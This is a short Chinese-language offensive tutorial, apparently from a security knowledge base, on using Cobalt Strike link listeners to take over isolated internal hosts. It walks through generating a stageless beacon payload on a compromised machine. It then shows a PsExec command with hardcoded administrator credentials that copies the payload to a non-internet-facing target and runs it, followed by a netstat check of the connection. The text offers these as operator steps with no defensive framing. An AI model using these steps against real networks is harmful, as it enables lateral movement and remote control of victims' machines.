Cobalt Strike Link Listener

实战中往往还会遇到通过某种方式,获取到目标内网中某台主机的系统权限,但是该主机处在隔离网络中,不能出网。因为CobalStrike服务端是搭建在互联网中的,通过常规方式是无法上线的,这里就需要利用已上线的主机,将它做一个Listener,实现链路上线CobalStrike。

首先,在已上线的主机创建Listener,监听端口可自定义。

image

择 Attacks->Packages->Windows Executable(Stageless),支持导出该类型Listener对应的可执行文件或dll等。

image

注意,选择刚建立的Listener名字,Proxy可不设置,这里生成exe保存本地。(未免杀)

image

上传刚才生成的payload到当前已上线的目标机中,还需要上传另一个工具PsExec.exe 。(CobalStrike本身psexec功能不够强大,且方法不唯一)

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

image

在Beacon中使用PsExec工具将payload上传到不出网的目标机中,自动执行,上线。

beacon> shell C:\WINDOWS\Temp\PsExec.exe -accepteula \\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe

image

端口查看,实际不出网目标机(192.168.144.196)是与出网目标机(192.168.144.155)正在建立连接。

beacon> shell netstat -ano |findstr 4444

image

因为这是link链接,只要主链路(即出网机Listener)掉线,就都会掉线!

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-27 01:03:22

results matching ""

    No results matching ""